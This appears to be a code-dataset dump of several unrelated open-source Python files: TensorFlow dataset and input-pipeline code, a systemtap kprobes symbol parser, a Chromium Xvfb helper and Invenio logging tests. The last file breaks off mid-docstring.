return type(args) is tuple # pylint: disable=unidiomatic-typecheck
class MapDataset(Dataset):
"""A `Dataset` that maps a function over elements in its input."""
def __init__(self, input_dataset, map_func):
"""See `Dataset.map()` for details."""
super(MapDataset, self).__init__()
self._input_dataset = input_dataset
self._output_shapes = None
self._output_types = None
@function.Defun(
*nest.flatten(sparse.unwrap_sparse_types(input_dataset.output_types)))
def tf_map_func(*args):
"""A wrapper for Defun that facilitates shape inference."""
# Pass in shape information from the input_dataset.
for arg, shape in zip(args, nest.flatten(input_dataset.output_shapes)):
arg.set_shape(shape)
nested_args = nest.pack_sequence_as(input_dataset.output_types, args)
nested_args = sparse.deserialize_sparse_tensors(
nested_args, input_dataset.output_types)
if _should_unpack_args(nested_args):
ret = map_func(*nested_args)
else:
ret = map_func(nested_args)
# If `map_func` returns a list of tensors, `nest.flatten()` and
# `ops.convert_to_tensor()` would conspire to attempt to stack
# those tensors into a single tensor, because the customized
# version of `nest.flatten()` does not recurse into lists. Since
# it is more likely that the list arose from returning the
# result of an operation (such as `tf.py_func()`) that returns a
# list of not-necessarily-stackable tensors, we treat the
# returned value is a `tuple` instead. A user wishing to pack
# the return value into a single tensor can use an explicit
# `tf.stack()` before returning.
if isinstance(ret, list):
ret = tuple(ret)
# Identify components that hold sparse tensor values.
types = sparse.get_sparse_types(ret)
# Serialize any sparse tensors and convert result to tensors.
ret = nest.pack_sequence_as(ret, [
ops.convert_to_tensor(t)
for t in nest.flatten(sparse.serialize_sparse_tensors(ret))
])
self._output_shapes = nest.pack_sequence_as(
types, [t.get_shape() for t in nest.flatten(ret)])
self._output_types = sparse.wrap_sparse_types(ret, types)
return nest.flatten(ret)
self._map_func = tf_map_func
self._map_func.add_to_graph(ops.get_default_graph())
def _as_variant_tensor(self):
input_t = self._input_dataset._as_variant_tensor() # pylint: disable=protected-access
return gen_dataset_ops.map_dataset(
input_t,
self._map_func.captured_inputs,
f=self._map_func,
output_types=nest.flatten(
sparse.unwrap_sparse_types(self.output_types)),
output_shapes=nest.flatten(self.output_shapes))
@property
def output_shapes(self):
return self._output_shapes
@property
def output_types(self):
return self._output_types
class ParallelMapDataset(MapDataset):
"""A `Dataset` that maps a function over elements in its input in parallel."""
def __init__(self, input_dataset, map_func, num_parallel_calls):
"""See `Dataset.map()` for details."""
super(ParallelMapDataset, self).__init__(input_dataset, map_func)
self._num_parallel_calls = ops.convert_to_tensor(
num_parallel_calls, dtype=dtypes.int32, name="num_parallel_calls")
def _as_variant_tensor(self):
input_t = self._input_dataset._as_variant_tensor() # pylint: disable=protected-access
# pylint: disable=protected-access
return gen_dataset_ops.parallel_map_dataset(
input_t,
self._map_func.captured_inputs,
f=self._map_func,
num_parallel_calls=self._num_parallel_calls,
output_types=nest.flatten(
sparse.unwrap_sparse_types(self.output_types)),
output_shapes=nest.flatten(self.output_shapes))
# pylint: enable=protected-access
class FlatMapDataset(Dataset):
"""A `Dataset` that maps a function over its input and flattens the result."""
def __init__(self, input_dataset, map_func):
"""See `Dataset.flat_map()` for details."""
super(FlatMapDataset, self).__init__()
self._input_dataset = input_dataset
@function.Defun(
*nest.flatten(sparse.unwrap_sparse_types(input_dataset.output_types)))
def tf_map_func(*args):
"""A wrapper for Defun that facilitates shape inference."""
# Pass in shape information from the input_dataset.
for arg, shape in zip(args, nest.flatten(input_dataset.output_shapes)):
arg.set_shape(shape)
nested_args = nest.pack_sequence_as(input_dataset.output_types, args)
nested_args = sparse.deserialize_sparse_tensors(
nested_args, input_dataset.output_types)
if _should_unpack_args(nested_args):
dataset = map_func(*nested_args)
else:
dataset = map_func(nested_args)
if not isinstance(dataset, Dataset):
raise TypeError("`map_func` must return a `Dataset` object.")
self._output_types = dataset.output_types
self._output_shapes = dataset.output_shapes
return dataset._as_variant_tensor() # pylint: disable=protected-access
self._map_func = tf_map_func
self._map_func.add_to_graph(ops.get_default_graph())
def _as_variant_tensor(self):
return gen_dataset_ops.flat_map_dataset(
self._input_dataset._as_variant_tensor(), # pylint: disable=protected-access
self._map_func.captured_inputs,
f=self._map_func,
output_types=nest.flatten(
sparse.unwrap_sparse_types(self.output_types)),
output_shapes=nest.flatten(self.output_shapes))
@property
def output_shapes(self):
return self._output_shapes
@property
def output_types(self):
return self._output_types
class InterleaveDataset(Dataset):
"""A `Dataset` that maps a function over its input and interleaves the result.
"""
def __init__(self, input_dataset, map_func, cycle_length, block_length):
"""See `Dataset.interleave()` for details."""
super(InterleaveDataset, self).__init__()
self._input_dataset = input_dataset
@function.Defun(
*nest.flatten(sparse.unwrap_sparse_types(input_dataset.output_types)))
def tf_map_func(*args):
"""A wrapper for Defun that facilitates shape inference."""
# Pass in shape information from the input_dataset.
for arg, shape in zip(args, nest.flatten(input_dataset.output_shapes)):
arg.set_shape(shape)
nested_args = nest.pack_sequence_as(input_dataset.output_types, args)
nested_args = sparse.deserialize_sparse_tensors(
nested_args, input_dataset.output_types)
if _should_unpack_args(nested_args):
dataset = map_func(*nested_args)
else:
dataset = map_func(nested_args)
if not isinstance(dataset, Dataset):
raise TypeError("`map_func` must return a `Dataset` object.")
self._output_types = dataset.output_types
self._output_shapes = dataset.output_shapes
return dataset._as_variant_tensor() # pylint: disable=protected-access
self._map_func = tf_map_func
self._map_func.add_to_graph(ops.get_default_graph())
self._cycle_length = ops.convert_to_tensor(
cycle_length, dtype=dtypes.int64, name="cycle_length")
self._block_length = ops.convert_to_tensor(
block_length, dtype=dtypes.int64, name="block_length")
def _as_variant_tensor(self):
return gen_dataset_ops.interleave_dataset(
self._input_dataset._as_variant_tensor(), # pylint: disable=protected-access
self._map_func.captured_inputs,
self._cycle_length,
self._block_length,
f=self._map_func,
output_types=nest.flatten(
sparse.unwrap_sparse_types(self.output_types)),
output_shapes=nest.flatten(self.output_shapes))
@property
def output_shapes(self):
return self._output_shapes
@property
def output_types(self):
return self._output_types
class FilterDataset(Dataset):
"""A `Dataset` that filters its input according to a predicate function."""
def __init__(self, input_dataset, predicate):
"""See `Dataset.filter()` for details."""
super(FilterDataset, self).__init__()
self._input_dataset = input_dataset
@function.Defun(
*nest.flatten(sparse.unwrap_sparse_types(input_dataset.output_types)))
def tf_predicate(*args):
"""A wrapper for Defun that facilitates shape inference."""
# Pass in shape information from the input_dataset.
for arg, shape in zip(args, nest.flatten(input_dataset.output_shapes)):
arg.set_shape(shape)
nested_args = nest.pack_sequence_as(input_dataset.output_types, args)
nested_args = sparse.deserialize_sparse_tensors(
nested_args, input_dataset.output_types)
if _should_unpack_args(nested_args):
ret = predicate(*nested_args)
else:
ret = predicate(nested_args)
ret = ops.convert_to_tensor(ret, dtype=dtypes.bool)
if not (ret.dtype == dtypes.bool and
ret.shape.is_compatible_with(tensor_shape.scalar())):
raise ValueError("`predicate` must return a scalar boolean tensor.")
return ret
self._predicate = tf_predicate
self._predicate.add_to_graph(ops.get_default_graph())
def _as_variant_tensor(self):
return gen_dataset_ops.filter_dataset(
self._input_dataset._as_variant_tensor(), # pylint: disable=protected-access
other_arguments=self._predicate.captured_inputs,
predicate=self._predicate,
output_types=nest.flatten(
sparse.unwrap_sparse_types(self.output_types)),
output_shapes=nest.flatten(self.output_shapes))
@property
def output_shapes(self):
return self._input_dataset.output_shapes
@property
def output_types(self):
return self._input_dataset.output_types
class PrefetchDataset(Dataset):
"""A `Dataset` that asynchronously prefetches its input."""
def __init__(self, input_dataset, buffer_size):
"""See `Dataset.prefetch()` for details."""
super(PrefetchDataset, self).__init__()
self._input_dataset = input_dataset
self._buffer_size = ops.convert_to_tensor(
buffer_size, dtype=dtypes.int64, name="buffer_size")
def _as_variant_tensor(self):
return gen_dataset_ops.prefetch_dataset(
self._input_dataset._as_variant_tensor(), # pylint: disable=protected-access
buffer_size=self._buffer_size,
output_shapes=nest.flatten(self.output_shapes),
output_types=nest.flatten(
sparse.unwrap_sparse_types(self.output_types)))
@property
def output_shapes(self):
return self._input_dataset.output_shapes
@property
def output_types(self):
return self._input_dataset.output_types
| apache-2.0 |
RasPlex/systemtap | scripts/kprobes_test/readelf.py | 15 | 2430 | #!/usr/bin/python
# Copyright (C) 2008 Red Hat Inc.
#
# This file is part of systemtap, and is free software. You can
# redistribute it and/or modify it under the terms of the GNU General
# Public License (GPL); either version 2, or (at your option) any
# later version.
import re
import sys
import os
#import pickle
import subprocess
from config_opts import config_opts
# Read the output of eu-readelf on vmlinux
(sysname, nodename, release, version, machine) = os.uname()
cmd = "eu-readelf --symbols /usr/lib/debug/lib/modules/%s/vmlinux" % release
print "Running", cmd
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
lines = p.stdout.readlines()
p.wait()
if p.returncode != 0:
print >>sys.stderr, "Error: eu-readelf failed."
sys.exit(p.returncode)
# Parse the output
kprobes_text_start = 0
kprobes_text_end = 0
syms = dict()
func_re = re.compile("^\s*\d+:\s+([0-9a-f]+)\s+\d+\s+FUNC\s+\S+\s+\S+\s+\d+\s+(\S+)$")
notype_re = re.compile("^\s*\d+:\s+([0-9a-f]+)\s+\d+\s+NOTYPE\s+\S+\s+\S+\s+\d+\s+(\S+)$")
for line in lines:
match = notype_re.match(line)
if match:
addr = match.group(1)
name = match.group(2)
if name == "__kprobes_text_start":
kprobes_text_start = long(addr, 16)
elif name == "__kprobes_text_end":
kprobes_text_end = long(addr, 16)
continue
match = func_re.match(line)
if match:
addr = match.group(1)
name = match.group(2)
syms[name] = long(addr, 16)
# Now we've parsed everything. Now we need to go back and remove all
# symbols between '__kprobes_text_start' and '__kprobes_text_end',
# since they are already protected from kprobes. We couldn't do this
# in the loop above, since we might encounter symbols that need to be
# removed before we found the start/end of the kprobes section.
if kprobes_text_start == 0 or kprobes_text_end == 0:
print "Error - didn't find kprobes_test_start(%d) or kprobes_text_end(%d)" \
% (kprobes_text_start, kprobes_text_end)
sys.exit(1)
for name in syms.keys():
if syms[name] >= kprobes_text_start and syms[name] < kprobes_text_end:
print "deleting", name
del syms[name]
## Save data
#f = open('%s.syms' % (release), 'w')
#p = pickle.Pickler(f)
#p.dump(syms)
#f.close()
# Write the data out in text format
f = open(config_opts['probes_all'], 'w')
for name in syms.keys():
print >>f, name
f.close()
| gpl-2.0 |
nwjs/chromium.src | build/android/pylib/utils/xvfb.py | 143 | 1551 | # Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# pylint: disable=W0702
import os
import signal
import subprocess
import sys
import time
def _IsLinux():
"""Return True if on Linux; else False."""
return sys.platform.startswith('linux')
class Xvfb(object):
"""Class to start and stop Xvfb if relevant. Nop if not Linux."""
def __init__(self):
self._pid = 0
def Start(self):
"""Start Xvfb and set an appropriate DISPLAY environment. Linux only.
Copied from tools/code_coverage/coverage_posix.py
"""
if not _IsLinux():
return
proc = subprocess.Popen(['Xvfb', ':9', '-screen', '0', '1024x768x24',
'-ac'],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
self._pid = proc.pid
if not self._pid:
raise Exception('Could not start Xvfb')
os.environ['DISPLAY'] = ':9'
# Now confirm, giving a chance for it to start if needed.
for _ in range(10):
proc = subprocess.Popen('xdpyinfo >/dev/null', shell=True)
_, retcode = os.waitpid(proc.pid, 0)
if retcode == 0:
break
time.sleep(0.25)
if retcode != 0:
raise Exception('Could not confirm Xvfb happiness')
def Stop(self):
"""Stop Xvfb if needed. Linux only."""
if self._pid:
try:
os.kill(self._pid, signal.SIGKILL)
except:
pass
del os.environ['DISPLAY']
self._pid = 0
| bsd-3-clause |
bruno314/invenio-logging-old | tests/test_invenio_logging.py | 1 | 3090 | # -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015 CERN.
#
# Invenio is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston,
# MA 02111-1307, USA.
#
# In applying this license, CERN does not
# waive the privileges and immunities granted to it by virtue of its status
# as an Intergovernmental Organization or submit itself to any jurisdiction.
"""Module tests."""
from __future__ import absolute_import, print_function
import os
from flask import Flask
from flask_babelex import Babel
from invenio_logging.ext_fs import InvenioLoggingFs
from invenio_logging.ext_sentry import InvenioLoggingSentry
import mock
def test_version():
"""Test version import."""
from invenio_logging import __version__
assert __version__
def test_init(generic_app):
"""Test extension initialization."""
# raise Exception("test_init")
ext = InvenioLoggingSentry(generic_app)
assert 'invenio-logging-sentry' in generic_app.extensions
ext = InvenioLoggingFs(generic_app)
assert 'invenio-logging-fs' in generic_app.extensions
"""app = Flask('testapp')
ext = InvenioLoggingFs()
assert 'invenio-logging-fs' not in app.extensions
ext.init_app(app)
assert 'invenio-logging-fs' in app.extensions"""
def test_sentry(app_for_sentry):
simple_mock = mock.MagicMock(return_value=True)
# print ("Starting sentry registration")
# assert False
# InvenioLoggingSentry(app=app_for_sentry, test_param=simple_mock)
# Do the logging
import random
test_strings = [str(random.random()) for i in range(2)]
# app_for_sentry.logger.warning(test_strings[0])
# app_for_sentry.logger.error(test_strings[1])
print ("CALLCOUNT={} ARGS={}".format(
simple_mock.call_count, simple_mock.call_args_list))
assert False
def test_fs(app_for_fs):
"""Test view."""
InvenioLoggingFs(app_for_fs)
import random
test_strings = [str(random.random()) for i in range(2)]
app_for_fs.logger.warning(test_strings[0])
app_for_fs.logger.error(test_strings[1])
log_file_name = os.path.join(app_for_fs.instance_path,
app_for_fs.config.get('CFG_LOGDIR', ''),
app_for_fs.logger_name) + '.log'
log_file_contents = open(log_file_name).read()
# Test whether logfiles contain required string
assert ("WARNING: " + test_strings[0]) in log_file_contents
assert ("ERROR: " + test_strings[1]) in log_file_contents
| gpl-2.0 |
ivano666/tensorflow | tensorflow/python/training/input.py | 3 | 36755 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Input pipeline.
Please see the [reading data how-to](../../how_tos/reading_data/index.md)
for context.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import constant_op
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import io_ops
from tensorflow.python.ops import logging_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import variables
from tensorflow.python.training import queue_runner
def match_filenames_once(pattern, name=None):
"""Save the list of files matching pattern, so it is only computed once.
Args:
pattern: A file pattern (glob).
name: A name for the operations (optional).
Returns:
A variable that is initialized to the list of files matching pattern.
"""
with ops.op_scope([pattern], name, "matching_filenames") as name:
return variables.Variable(io_ops.matching_files(pattern), trainable=False,
name=name, validate_shape=False)
def limit_epochs(tensor, num_epochs=None, name=None):
"""Returns tensor `num_epochs` times and then raises an `OutOfRange` error.
Args:
tensor: Any `Tensor`.
num_epochs: A positive integer (optional). If specified, limits the number
of steps the output tensor may be evaluated.
name: A name for the operations (optional).
Returns:
tensor or `OutOfRange`.
Raises:
ValueError: if `num_epochs` is invalid.
"""
if num_epochs is None:
return tensor
if num_epochs <= 0:
raise ValueError("num_epochs must be > 0 not %d." % num_epochs)
with ops.op_scope([tensor], name, "limit_epochs") as name:
zero64 = constant_op.constant(0, dtype=dtypes.int64)
epochs = variables.Variable(zero64, name="epochs", trainable=False)
counter = epochs.count_up_to(num_epochs)
with ops.control_dependencies([counter]):
return array_ops.identity(tensor, name=name)
def input_producer(input_tensor, element_shape=None, num_epochs=None,
shuffle=True, seed=None, capacity=32, shared_name=None,
summary_name=None, name=None):
"""Output the rows of `input_tensor` to a queue for an input pipeline.
Args:
input_tensor: A tensor with the rows to produce. Must be at
one-dimensional. Must either have a fully-defined shape, or
`element_shape` must be defined.
element_shape: (Optional.) A `TensorShape` representing the shape of a
row of `input_tensor`, if it cannot be inferred.
num_epochs: (Optional.) An integer. If specified `input_producer` produces
each row of `input_tensor` `num_epochs` times before generating an
`OutOfRange` error. If not specified, `input_producer` can cycle through
the rows of `input_tensor` an unlimited number of times.
shuffle: (Optional.) A boolean. If true, the rows are randomly shuffled
within each eopch.
seed: (Optional.) An integer. The seed to use if `shuffle` is true.
capacity: (Optional.) The capacity of the queue to be used for buffering
the input.
shared_name: (Optional.) If set, this queue will be shared under the given
name across multiple sessions.
summary_name: (Optional.) If set, a scalar summary for the current queue
size will be generated, using this name as part of the tag.
name: (Optional.) A name for queue.
Returns:
A queue with the output rows. A `QueueRunner` for the queue is
added to the current `QUEUE_RUNNER` collection of the current
graph.
Raises:
ValueError: If the shape of the input cannot be inferred from the arguments.
"""
with ops.op_scope([input_tensor], name, "input_producer"):
input_tensor = ops.convert_to_tensor(input_tensor, name="input_tensor")
element_shape = input_tensor.get_shape()[1:].merge_with(element_shape)
if not element_shape.is_fully_defined():
raise ValueError("Either `input_tensor` must have a fully defined shape "
"or `element_shape` must be specified")
if shuffle:
input_tensor = random_ops.random_shuffle(input_tensor, seed=seed)
input_tensor = limit_epochs(input_tensor, num_epochs)
q = data_flow_ops.FIFOQueue(capacity=capacity,
dtypes=[input_tensor.dtype.base_dtype],
shapes=[element_shape],
shared_name=shared_name, name=name)
enq = q.enqueue_many([input_tensor])
queue_runner.add_queue_runner(queue_runner.QueueRunner(q, [enq]))
if summary_name is not None:
logging_ops.scalar_summary("queue/%s/%s" % (q.name, summary_name),
math_ops.cast(q.size(), dtypes.float32) *
(1. / capacity))
return q
def string_input_producer(string_tensor, num_epochs=None, shuffle=True,
seed=None, capacity=32, shared_name=None, name=None):
"""Output strings (e.g. filenames) to a queue for an input pipeline.
Args:
string_tensor: A 1-D string tensor with the strings to produce.
num_epochs: An integer (optional). If specified, `string_input_producer`
produces each string from `string_tensor` `num_epochs` times before
generating an `OutOfRange` error. If not specified,
`string_input_producer` can cycle through the strings in `string_tensor`
an unlimited number of times.
shuffle: Boolean. If true, the strings are randomly shuffled within each
epoch.
seed: An integer (optional). Seed used if shuffle == True.
capacity: An integer. Sets the queue capacity.
shared_name: (optional). If set, this queue will be shared under the given
name across multiple sessions.
name: A name for the operations (optional).
Returns:
A queue with the output strings. A `QueueRunner` for the Queue
is added to the current `Graph`'s `QUEUE_RUNNER` collection.
Raises:
ValueError: If the string_tensor is a null Python list. At runtime,
will fail with an assertion if string_tensor becomes a null tensor.
"""
not_null_err = "string_input_producer requires a non-null input tensor"
if not isinstance(string_tensor, ops.Tensor) and not string_tensor:
raise ValueError(not_null_err)
with ops.op_scope([string_tensor], name, "input_producer") as name:
string_tensor = ops.convert_to_tensor(string_tensor, dtype=dtypes.string)
with ops.control_dependencies([
logging_ops.Assert(math_ops.greater(array_ops.size(string_tensor), 0),
[not_null_err])]):
string_tensor = array_ops.identity(string_tensor)
return input_producer(
input_tensor=string_tensor,
element_shape=[],
num_epochs=num_epochs,
shuffle=shuffle,
seed=seed,
capacity=capacity,
shared_name=shared_name,
name=name,
summary_name="fraction_of_%d_full" % capacity)
def range_input_producer(limit, num_epochs=None, shuffle=True, seed=None,
capacity=32, shared_name=None, name=None):
"""Produces the integers from 0 to limit-1 in a queue.
Args:
limit: An int32 scalar tensor.
num_epochs: An integer (optional). If specified, `range_input_producer`
produces each integer `num_epochs` times before generating an
OutOfRange error. If not specified, `range_input_producer` can cycle
through the integers an unlimited number of times.
shuffle: Boolean. If true, the integers are randomly shuffled within each
epoch.
seed: An integer (optional). Seed used if shuffle == True.
capacity: An integer. Sets the queue capacity.
shared_name: (optional). If set, this queue will be shared under the given
name across multiple sessions.
name: A name for the operations (optional).
Returns:
A Queue with the output integers. A `QueueRunner` for the Queue
is added to the current `Graph`'s `QUEUE_RUNNER` collection.
"""
with ops.op_scope([limit], name, "input_producer") as name:
range_tensor = math_ops.range(limit)
return input_producer(
range_tensor, [], num_epochs, shuffle, seed, capacity,
shared_name, name, "fraction_of_%d_full" % capacity)
def slice_input_producer(tensor_list, num_epochs=None, shuffle=True, seed=None,
capacity=32, shared_name=None, name=None):
"""Produces a slice of each `Tensor` in `tensor_list`.
Implemented using a Queue -- a `QueueRunner` for the Queue
is added to the current `Graph`'s `QUEUE_RUNNER` collection.
Args:
tensor_list: A list of `Tensor` objects. Every `Tensor` in
`tensor_list` must have the same size in the first dimension.
num_epochs: An integer (optional). If specified, `slice_input_producer`
produces each slice `num_epochs` times before generating
an `OutOfRange` error. If not specified, `slice_input_producer` can cycle
through the slices an unlimited number of times.
shuffle: Boolean. If true, the integers are randomly shuffled within each
epoch.
seed: An integer (optional). Seed used if shuffle == True.
capacity: An integer. Sets the queue capacity.
shared_name: (optional). If set, this queue will be shared under the given
name across multiple sessions.
name: A name for the operations (optional).
Returns:
A list of tensors, one for each element of `tensor_list`. If the tensor
in `tensor_list` has shape `[N, a, b, .., z]`, then the corresponding output
tensor will have shape `[a, b, ..., z]`.
Raises:
ValueError: if `slice_input_producer` produces nothing from `tensor_list`.
"""
with ops.op_scope(tensor_list, name, "input_producer"):
tensor_list = ops.convert_n_to_tensor_or_indexed_slices(tensor_list)
if not tensor_list:
raise ValueError(
"Expected at least one tensor in slice_input_producer().")
range_size = array_ops.shape(tensor_list[0])[0]
# TODO(josh11b): Add an assertion that the first dimension of
# everything in TensorList matches. Maybe just check the inferred shapes?
queue = range_input_producer(range_size, num_epochs=num_epochs,
shuffle=shuffle, seed=seed, capacity=capacity,
shared_name=shared_name)
index = queue.dequeue()
output = [array_ops.gather(t, index) for t in tensor_list]
return output
# Helpers for the batching functions ------------------------------------------
def _flatten(tensor_list_list):
return [tensor for tensor_list in tensor_list_list for tensor in tensor_list]
class _SparseMetaData(object):
"""Store information about the Tensor: Is it sparse?, dtype, and rank."""
def __init__(self, sparse, dtype, rank):
self._sparse = sparse
self._dtype = dtype
self._rank = rank
def __eq__(self, other):
if self.sparse != other.sparse:
return False
if not self.sparse:
return True
if self.dtype != other.dtype:
return False
if not self.rank.is_compatible_with(other.rank):
return False
return True
def __ne__(self, other):
return not self.__eq__(other)
def __str__(self):
return "[SparseMetaData(%s, %s, %s)]" % (self.sparse, self.dtype, self.rank)
def merge_with(self, other):
if self != other:
raise ValueError("SparseMetaData objects are incompatible: %s vs. %s"
% (self, other))
if self.sparse:
self.rank.merge_with(other.rank)
return self
@property
def dtype(self):
return self._dtype
@property
def sparse(self):
return self._sparse
@property
def rank(self):
return self._rank
def _as_tensor_list(tensors):
if isinstance(tensors, dict):
return [tensors[k] for k in sorted(tensors)]
else:
return tensors
def _as_tensor_list_list(tensors_list):
if not tensors_list:
raise ValueError("Expected at least one set of tensors")
if isinstance(tensors_list[0], dict):
expected_keys = set(tensors_list[0].keys())
for tensors in tensors_list[1:]:
if set(tensors.keys()) != expected_keys:
raise ValueError("All dictionaries in tensors_list must have "
"the same keys")
return [_as_tensor_list(tensors) for tensors in tensors_list]
else:
return tensors_list
def _as_original_type(original_tensors, tensor_list):
if isinstance(original_tensors, dict):
if len(original_tensors) == 1:
# tensor_list is bogusly returned as a single tensor if only one tensor
# was enqueued. Make it a list again. See b/28117485.
tensor_list = [tensor_list]
return {k: tensor_list[i]
for i, k in enumerate(sorted(original_tensors))}
else:
return tensor_list
def _serialize_sparse_tensors(tensor_list, enqueue_many):
"""Serialize SparseTensors for feeding into batch, etc."""
def _sparse_meta_data(t):
if not isinstance(t, ops.SparseTensor):
return _SparseMetaData(False, None, None)
rank = t.shape.get_shape().with_rank(1)[0]
if enqueue_many:
rank -= 1
return _SparseMetaData(sparse=True, dtype=t.dtype, rank=rank)
def _maybe_serialize(t):
if not isinstance(t, ops.SparseTensor):
return t
return (sparse_ops.serialize_many_sparse(t) if enqueue_many
else sparse_ops.serialize_sparse(t))
serialized_list = [_maybe_serialize(t) for t in tensor_list]
sparse_info_list = [_sparse_meta_data(t) for t in tensor_list]
return serialized_list, sparse_info_list
def _serialize_sparse_tensors_join(tensor_list_list, enqueue_many):
"""Serialize SparseTensors for feeding into batch_join, etc."""
(s0, sparse_info_list) = _serialize_sparse_tensors(
tensor_list_list[0], enqueue_many)
serialized_list_list = [s0]
for tensor_list in tensor_list_list[1:]:
s, sparse_info_candidate = _serialize_sparse_tensors(
tensor_list, enqueue_many)
if sparse_info_list != sparse_info_candidate:
raise ValueError("Inconsistent SparseTensors list: %s vs. %s"
% (tensor_list_list[0], tensor_list))
sparse_info_list = [
info.merge_with(candidate)
for (info, candidate) in zip(sparse_info_list, sparse_info_candidate)]
serialized_list_list.append(s)
return (serialized_list_list, sparse_info_list)
def _deserialize_sparse_tensors(serialized_list, sparse_info_list):
"""Deserialize SparseTensors after dequeue in batch, batch_join, etc."""
received_sequence = isinstance(serialized_list, collections.Sequence)
if not received_sequence:
serialized_list = (serialized_list,)
tensors = [
sparse_ops.deserialize_many_sparse(s, info.dtype, (info.rank + 1).value)
if info.sparse else s
for (s, info)
in zip(serialized_list, sparse_info_list)]
return tensors if received_sequence else tensors[0]
def _validate(tensor_list):
tensor_list = ops.convert_n_to_tensor_or_indexed_slices(tensor_list)
if not tensor_list:
raise ValueError("Expected at least one tensor in batch().")
return tensor_list
def _validate_join(tensor_list_list):
tensor_list_list = [ops.convert_n_to_tensor_or_indexed_slices(tl)
for tl in tensor_list_list]
if not tensor_list_list:
raise ValueError("Expected at least one input in batch_join().")
return tensor_list_list
def _dtypes(tensor_list_list):
all_types = [[t.dtype for t in tl] for tl in tensor_list_list]
types = all_types[0]
for other_types in all_types[1:]:
if other_types != types:
raise TypeError("Expected types to be consistent: %s vs. %s." %
(", ".join(x.name for x in types),
", ".join(x.name for x in other_types)))
return types
def _merge_shapes(shape_list, enqueue_many):
shape_list = [tensor_shape.as_shape(s) for s in shape_list]
if enqueue_many:
# We want the shapes without the leading batch dimension.
shape_list = [s.with_rank_at_least(1)[1:] for s in shape_list]
merged_shape = shape_list[0]
for s in shape_list[1:]:
merged_shape.merge_with(s)
return merged_shape.as_list()
def _shapes(tensor_list_list, shapes, enqueue_many):
"""Calculate and merge the shapes of incoming tensors.
Args:
tensor_list_list: List of tensor lists.
shapes: List of shape tuples corresponding to tensors within the lists.
enqueue_many: Boolean describing whether shapes will be enqueued as
batches or individual entries.
Returns:
A list of shapes aggregating shape inference info from `tensor_list_list`,
or returning `shapes` if it is not `None`.
Raises:
ValueError: If any of the inferred shapes in `tensor_list_list` lack a
well defined rank.
"""
if shapes is None:
len0 = len(tensor_list_list[0])
for tl in tensor_list_list:
for i in xrange(len0):
if tl[i].get_shape().ndims is None:
raise ValueError("Cannot infer Tensor's rank: %s" % tl[i])
shapes = [_merge_shapes(
[tl[i].get_shape().as_list() for tl in tensor_list_list], enqueue_many)
for i in xrange(len0)]
return shapes
def _enqueue_join(queue, tensor_list_list, enqueue_many):
if enqueue_many:
enqueue_ops = [queue.enqueue_many(tl) for tl in tensor_list_list]
else:
enqueue_ops = [queue.enqueue(tl) for tl in tensor_list_list]
queue_runner.add_queue_runner(queue_runner.QueueRunner(queue, enqueue_ops))
def _enqueue(queue, tensor_list, threads, enqueue_many):
if enqueue_many:
enqueue_ops = [queue.enqueue_many(tensor_list)] * threads
else:
enqueue_ops = [queue.enqueue(tensor_list)] * threads
queue_runner.add_queue_runner(queue_runner.QueueRunner(queue, enqueue_ops))
def _which_queue(dynamic_pad):
return (data_flow_ops.PaddingFIFOQueue if dynamic_pad
else data_flow_ops.FIFOQueue)
# Batching functions ----------------------------------------------------------
def batch(tensors, batch_size, num_threads=1, capacity=32,
enqueue_many=False, shapes=None, dynamic_pad=False,
shared_name=None, name=None):
"""Creates batches of tensors in `tensors`.
The argument `tensors` can be a list or a dictionary of tensors.
The value returned by the function will be of the same type
as `tensors`.
This function is implemented using a queue. A `QueueRunner` for the
queue is added to the current `Graph`'s `QUEUE_RUNNER` collection.
If `enqueue_many` is `False`, `tensors` is assumed to represent a single
example. An input tensor with shape `[x, y, z]` will be output as a tensor
with shape `[batch_size, x, y, z]`.
If `enqueue_many` is `True`, `tensors` is assumed to represent a batch of
examples, where the first dimension is indexed by example, and all members of
`tensor_list` should have the same size in the first dimension. If an input
tensor has shape `[*, x, y, z]`, the output will have shape `[batch_size, x,
y, z]`. The `capacity` argument controls the how long the prefetching is
allowed to grow the queues.
The returned operation is a dequeue operation and will throw
`tf.errors.OutOfRangeError` if the input queue is exhausted. If this
operation is feeding another input queue, its queue runner will catch
this exception, however, if this operation is used in your main thread
you are responsible for catching this yourself.
*N.B.:* If `dynamic_pad` is `False`, you must ensure that either
(i) the `shapes` argument is passed, or (ii) all of the tensors in
`tensors` must have fully-defined shapes. `ValueError` will be
raised if neither of these conditions holds.
If `dynamic_pad` is `True`, it is sufficient that the *rank* of the
tensors is known, but individual dimensions may have shape `None`.
In this case, for each enqueue the dimensions with value `None`
may have a variable length; upon dequeue, the output tensors will be padded
on the right to the maximum shape of the tensors in the current minibatch.
For numbers, this padding takes value 0. For strings, this padding is
the empty string. See `PaddingFIFOQueue` for more info.
Args:
tensors: The list or dictionary of tensors to enqueue.
batch_size: The new batch size pulled from the queue.
